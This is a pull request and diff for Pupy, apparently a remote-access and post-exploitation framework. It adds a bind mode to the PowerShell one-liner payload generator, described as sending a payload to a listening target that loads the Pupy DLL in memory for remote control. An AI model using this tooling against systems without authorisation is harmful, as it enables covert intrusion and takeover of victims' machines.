### PR TITLE
ps1_oneliner in bind mode implemented

### DIFF
--- a/pupy/network/lib/launchers/bind.py
+++ b/pupy/network/lib/launchers/bind.py
@@ -13,6 +13,7 @@ class BindLauncher(BaseLauncher):
         self.arg_parser = LauncherArgumentParser(prog="bind", description=self.__doc__)
         self.arg_parser.add_argument('--port', metavar='<port>', type=int, required=True, help='the port to bind on')
         self.arg_parser.add_argument('--host', metavar='<ip>', default='0.0.0.0', help='the ip to listen on (default 0.0.0.0)')
+        self.arg_parser.add_argument('--oneliner-host', metavar='<ip>', help='the ip of the target (for ps1_oneliner launcher only)')
         self.arg_parser.add_argument('-t', '--transport', choices=[x for x in network.conf.transports.iterkeys()], default="ssl", help="the transport to use ! (the pupysh.sh --connect will need to be configured with the same transport) ")
         self.arg_parser.add_argument('transport_args', nargs=argparse.REMAINDER, help="change some transport arguments")
 

--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -647,13 +647,27 @@ def pupygen(args, config):
         outpath = generate_ps1(conf, outpath=outpath, output_dir=args.output_dir, both=True)
     
     elif args.format=="ps1_oneliner":
-        from pupylib.payloads.ps1_oneliner import serve_ps1_payload
-        link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
-        if args.oneliner_no_ssl == False : sslEnabled = True
-        else: sslEnabled = False
-        if args.no_use_proxy == False : useTargetProxy = True
-        else: useTargetProxy = False
-        serve_ps1_payload(conf, link_ip=link_ip, port=args.oneliner_listen_port, useTargetProxy=useTargetProxy, sslEnabled=sslEnabled, nothidden=args.oneliner_nothidden)
+        if conf['launcher'] in ["connect", "auto_proxy"]:
+            from pupylib.payloads.ps1_oneliner import serve_ps1_payload
+            link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
+            if args.oneliner_no_ssl == False : sslEnabled = True
+            else: sslEnabled = False
+            if args.no_use_proxy == False : useTargetProxy = True
+            else: useTargetProxy = False
+            serve_ps1_payload(conf, link_ip=link_ip, port=args.oneliner_listen_port, useTargetProxy=useTargetProxy, sslEnabled=sslEnabled, nothidden=args.oneliner_nothidden)
+        elif conf['launcher'] == "bind":
+            from pupylib.payloads.ps1_oneliner import send_ps1_payload
+            print conf["launcher_args"]
+            print conf
+            outpath, target_ip, bind_port = "", None, None
+            bind_port=conf["launcher_args"][conf["launcher_args"].index("--port")+1]
+            if "--oneliner-host" in conf["launcher_args"]:
+                target_ip=conf["launcher_args"][conf["launcher_args"].index("--oneliner-host")+1]
+                send_ps1_payload(conf, bind_port=bind_port, target_ip=target_ip, nothidden=args.oneliner_nothidden)
+            else:
+                raise ValueError("You have to give me the --oneliner-host argument")
+        else:
+            raise ValueError("ps1_oneliner with {0} mode is not implemented yet".format(conf['launcher']))
     
     elif args.format=="rubber_ducky":
         rubber_ducky(conf).generateAllForOStarget()


### PR DESCRIPTION
ps1_oneliner is implemented with the bind mode now.

You execute the ps1 command on the target. The target listens on a port.
Pupygen.sh connects to the target port and sends the powershell payload.
The pupy DLL is loaded in memory on the target.
After, you use pupysh.py for connecting to the target.

Example:
```
python pupygen.py -f ps1_oneliner bind --oneliner-host 192.168.0.1 --port 1234
```